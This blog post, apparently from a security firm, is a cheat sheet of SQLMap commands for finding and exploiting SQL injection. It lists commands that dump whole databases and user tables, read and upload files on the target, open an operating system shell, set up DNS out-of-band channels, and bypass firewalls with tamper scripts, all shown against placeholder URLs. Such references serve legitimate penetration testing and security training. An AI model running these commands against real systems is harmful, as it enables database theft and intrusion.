SQLMap Cheat Sheet
Cheat Sheets

SQLMap Cheat Sheet

parrotassassin15 October 8, 2024 3 min read 27 views

What is SQLMap?

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws and takes over database servers.

Basic SQLMap Commands

CommandDescription
sqlmap -u <URL>Scan the URL for SQL injection vulnerabilities
sqlmap -r <request_file>Scan from a saved HTTP request file
sqlmap -u <URL> --dbsList available databases on the target
sqlmap -u <URL> -D <db_name> --tablesList tables in a specific database
sqlmap -u <URL> -D <db_name> -T <table_name> --columnsList columns in a specific table
sqlmap -u <URL> -D <db_name> -T <table_name> -C <columns> --dumpDump data from specific columns
sqlmap -u <URL> --dump-allDump the entire database
sqlmap -u <URL> --os-shellGet a command shell on the operating system
sqlmap -u <URL> --dbms <DBMS>Force SQLMap to use a specific database management system (e.g., MySQL, PostgreSQL)

Advanced Usage

1. Specifying Data Parameters

If the vulnerable parameter isn't in the URL, you can specify it manually.

CommandDescription
sqlmap -u <URL> --data="param1=value1&param2=value2"Inject SQL into POST request parameters
sqlmap -u <URL> --method PUT --data="param1=value1"Use HTTP PUT method with SQLMap

2. Cookie-based SQL Injection

If the vulnerability is within the cookies, you can pass the cookie values.

CommandDescription
sqlmap -u <URL> --cookie="PHPSESSID=abcd1234"Use cookies to authenticate and test for vulnerabilities

3. Scan with Specific User-Agent

CommandDescription
sqlmap -u <URL> --user-agent="Mozilla/5.0"Spoof the User-Agent header in the request

4. Use a Proxy

CommandDescription
sqlmap -u <URL> --proxy="http://localhost:8080"Route the SQLMap traffic through a proxy (e.g., Burp Suite)

Enumeration

1. Get Database Version

sqlmap -u <URL> --banner

2. List Databases

sqlmap -u <URL> --dbs

3. List Tables in a Specific Database

sqlmap -u <URL> -D <db_name> --tables

4. List Columns in a Specific Table

sqlmap -u <URL> -D <db_name> -T <table_name> --columns

5. Dump Table Data

sqlmap -u <URL> -D <db_name> -T <table_name> --dump

6. Dump Specific Columns

sqlmap -u <URL> -D <db_name> -T <table_name> -C <column1,column2> --dump

Exploitation Options

1. File System Access

CommandDescription
sqlmap -u <URL> --file-read <file>Read a file from the target's file system
sqlmap -u <URL> --file-write <local_file> --file-dest <remote_file>Upload a file to the target

2. Command Shell

CommandDescription
sqlmap -u <URL> --os-shellGet an interactive operating system shell on the target

3. Out-of-Band Connections

CommandDescription
sqlmap -u <URL> --dns-domain=<domain>Perform out-of-band (OOB) interaction via DNS
sqlmap -u <URL> --dns-server=<server>Specify a DNS server for OOB interactions

Other Useful Flags

CommandDescription
sqlmap -u <URL> --batchAutomatically skip prompts (useful for automation)
sqlmap -u <URL> --tamper=<tamper_script>Use tamper scripts to bypass WAF/IDS (e.g., --tamper=space2comment)
sqlmap -u <URL> --level=<level>Set the level of tests (1 to 5, higher levels test more parameters)
sqlmap -u <URL> --risk=<risk>Set the risk level of tests (1 to 3, higher risks may cause more intrusive operations)
sqlmap -u <URL> --random-agentUse a randomly chosen User-Agent string

Example Commands

1. Basic SQL Injection Scan

sqlmap -u http://example.com/index.php?id=1

2. Dump Entire Database

sqlmap -u http://example.com/index.php?id=1 --dump-all

3. Dump Specific Database Table

sqlmap -u http://example.com/index.php?id=1 -D testdb -T users --dump

4. Bypass WAF Using Tamper Script

sqlmap -u http://example.com/index.php?id=1 --tamper=space2comment

Tamper Scripts

Tamper scripts can help you bypass Web Application Firewalls (WAFs) by modifying SQL queries. Some common tamper scripts:

ScriptDescription
space2comment.pyReplaces space characters with inline comments
between.pyReplaces SQL operators with the BETWEEN clause
randomcase.pyRandomizes the case of SQL keywords

Usage Example:

sqlmap -u http://example.com/index.php?id=1 --tamper=space2comment
Web Application Hacking API Hacking
Written by

parrotassassin15

Cybersecurity professional and contributor at Lorikeet Security.

Share this article
Back to Blog

Related Articles

Jan 13, 2025

The Ultimate Wireshark Cheat Sheet: Master Network Analysis Like a Pro

Wireshark is the go-to tool for anyone diving into the world of network analysis, cybersecurity, or ...
Dec 26, 2024

The Ultimate Guide to Nuclei Enumeration Scanner

What is Nuclei? Nuclei is an open-source tool developed by ProjectDiscovery, designed to streamline ...
Oct 13, 2024

Comprehensive Burp Suite Cheat Sheet for Web Application Security Testing

Burp Suite is one of the most powerful tools for web application security testing, used widely by pe...
Lory waving

Hi, I'm Lory! Need help finding the right service? Click to chat!